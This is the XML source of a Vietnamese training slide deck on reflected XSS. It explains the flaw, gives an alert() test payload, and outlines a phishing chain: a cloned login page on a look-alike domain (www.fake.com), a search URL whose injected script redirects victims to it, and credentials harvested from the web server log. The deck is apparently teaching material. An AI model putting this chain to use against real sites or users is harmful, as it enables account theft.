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B870FC-4B03-41E9-9EC1-B4AEECFE642E}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>11/26/2021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41F8FFC9-4857-4671-A971-68B0E8D8A7FB}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="179704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B870FC-4B03-41E9-9EC1-B4AEECFE642E}"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8FFC9-4857-4671-A971-68B0E8D8A7FB}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2764955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B870FC-4B03-41E9-9EC1-B4AEECFE642E}"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8FFC9-4857-4671-A971-68B0E8D8A7FB}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3994804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B870FC-4B03-41E9-9EC1-B4AEECFE642E}"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8FFC9-4857-4671-A971-68B0E8D8A7FB}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4223964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B870FC-4B03-41E9-9EC1-B4AEECFE642E}"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8FFC9-4857-4671-A971-68B0E8D8A7FB}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3651780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B870FC-4B03-41E9-9EC1-B4AEECFE642E}"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8FFC9-4857-4671-A971-68B0E8D8A7FB}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3398224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B870FC-4B03-41E9-9EC1-B4AEECFE642E}"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8FFC9-4857-4671-A971-68B0E8D8A7FB}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1224271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B870FC-4B03-41E9-9EC1-B4AEECFE642E}"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8FFC9-4857-4671-A971-68B0E8D8A7FB}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2851790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B870FC-4B03-41E9-9EC1-B4AEECFE642E}"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8FFC9-4857-4671-A971-68B0E8D8A7FB}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="97401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B870FC-4B03-41E9-9EC1-B4AEECFE642E}"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41F8FFC9-4857-4671-A971-68B0E8D8A7FB}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1898244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B870FC-4B03-41E9-9EC1-B4AEECFE642E}"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8FFC9-4857-4671-A971-68B0E8D8A7FB}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1677210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B870FC-4B03-41E9-9EC1-B4AEECFE642E}"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8FFC9-4857-4671-A971-68B0E8D8A7FB}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="716608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B870FC-4B03-41E9-9EC1-B4AEECFE642E}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>11/26/2021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F8FFC9-4857-4671-A971-68B0E8D8A7FB}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="141451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B870FC-4B03-41E9-9EC1-B4AEECFE642E}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>11/26/2021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F8FFC9-4857-4671-A971-68B0E8D8A7FB}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2762697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B870FC-4B03-41E9-9EC1-B4AEECFE642E}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>11/26/2021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F8FFC9-4857-4671-A971-68B0E8D8A7FB}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3772112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B870FC-4B03-41E9-9EC1-B4AEECFE642E}"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8FFC9-4857-4671-A971-68B0E8D8A7FB}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="142383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B870FC-4B03-41E9-9EC1-B4AEECFE642E}"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8FFC9-4857-4671-A971-68B0E8D8A7FB}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2240422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B870FC-4B03-41E9-9EC1-B4AEECFE642E}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>11/26/2021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F8FFC9-4857-4671-A971-68B0E8D8A7FB}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="9666882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pplication.security/free-application-security-training/owasp-top-10-reflected-cross-site-script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3B0F4-B2F8-40D2-84ED-C9F668313DF7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>Reflected XSS</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" b="0" i="0">
                <a:solidFill>
                  <a:srgbClr val="C0CBEB"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
            </a:br>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Subtitle 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{292ECE70-4BC2-4D84-8BF6-622FE98BE580}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>-ChienPD4-</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="314489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AF82B-29BE-4062-8A0C-A48A88A49FBA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Tổng quan</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{101E324B-0D1B-4CB9-8821-AEFD61697D71}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:effectLst/>
                <a:latin typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
                <a:ea typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>Reflected-Xss phát sinh khi một ứng dụng nhận dữ liệu trong một yêu cầu HTTP và bao gồm dữ liệu đó trong phản hồi tức thì theo cách không an toàn.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4294923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3CBB-6FF5-44C7-B9A4-A7AC0FEC5A27}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1484310" y="347597"/>
            <a:ext cx="10018713" cy="1752599"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Khai thác</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B5D8761E-D59A-4F56-A605-DF4967B31DEF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1484310" y="1941535"/>
            <a:ext cx="10018713" cy="3849666"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:latin typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
                <a:ea typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>Một thanh search cho phép tìm kiếm và hiển thị kết quả trên trình duyệt bao gồm từ khóa tìm kiếm (nếu ko tìm thấy kết quả) . Tuy nhiên , nếu không xử lí tốt đầu vào rất có thể dẫn đến XSS.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:latin typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
                <a:ea typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>Payload : &lt;script&gt;alert('hacked')&lt;/script&gt; -&gt; popup đc bật -&gt; XSS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="vi-VN" sz="2000">
                <a:latin typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
                <a:ea typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:latin typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
                <a:ea typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>T</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" sz="2000">
                <a:latin typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
                <a:ea typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>rước tiên</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:latin typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
                <a:ea typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" sz="2000">
                <a:latin typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
                <a:ea typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t> tạo một trang web đăng nhập giả giống với giao diện đăng nhập của</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:latin typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
                <a:ea typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t> mục tiêu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" sz="2000">
                <a:latin typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
                <a:ea typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>. Sau đó, đăng ký tên miền www.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:latin typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
                <a:ea typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>fake</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" sz="2000">
                <a:latin typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
                <a:ea typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>.com, một trang nghe có vẻ giống với tên miền thật của</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:latin typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
                <a:ea typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t> mục tiêu </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" sz="2000">
                <a:latin typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
                <a:ea typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>. Cuối cùng, khởi động máy chủ web để </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:latin typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
                <a:ea typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>chạy </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" sz="2000">
                <a:latin typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
                <a:ea typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t> trang đăng nhập độc hại và bắt đầu theo dõi tệp nhật ký máy chủ web</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:latin typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
                <a:ea typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:latin typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
                <a:ea typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>service apache2 start &amp;&amp; tail -f /var/log/access.log</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1710499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29B90-FCF2-42F9-9A66-1559F6D50A75}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1484310" y="839245"/>
            <a:ext cx="10018713" cy="4951956"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Đánh lừa nạn nhân truy cập vào trang web có dính lỗi xss , và thực hiện chuyển hướng đến trang đăng nhập giả mạo .</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" u="sng">
                <a:solidFill>
                  <a:srgbClr val="0080CC"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>https://www.sourceyard.com/bob/blender/issues?query=&lt;script&gt;document.location = 'www.fake.com';&lt;/script&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Cuối cùng chỉ cần theo dõi file log chờ nạn nhân thực hiện đăng nhập và có được account của họ.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" u="sng">
              <a:solidFill>
                <a:srgbClr val="0080CC"/>
              </a:solidFill>
              <a:latin typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="26274892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270</TotalTime>
  <Words>274</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Corbel</vt:lpstr>
      <vt:lpstr>Roboto</vt:lpstr>
      <vt:lpstr>Parallax</vt:lpstr>
      <vt:lpstr>Reflected XSS </vt:lpstr>
      <vt:lpstr>Tổng quan</vt:lpstr>
      <vt:lpstr>Khai thác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Reflected XSS </dc:title>
  <dc:creator>Pham Duy Chien (FIS CSD HN)</dc:creator>
  <cp:lastModifiedBy>Pham Duy Chien (FIS CSD HN)</cp:lastModifiedBy>
  <cp:revision>1</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2021-11-26T08:47:12Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2021-11-26T13:17:38Z</dcterms:modified>
</cp:coreProperties>
</file>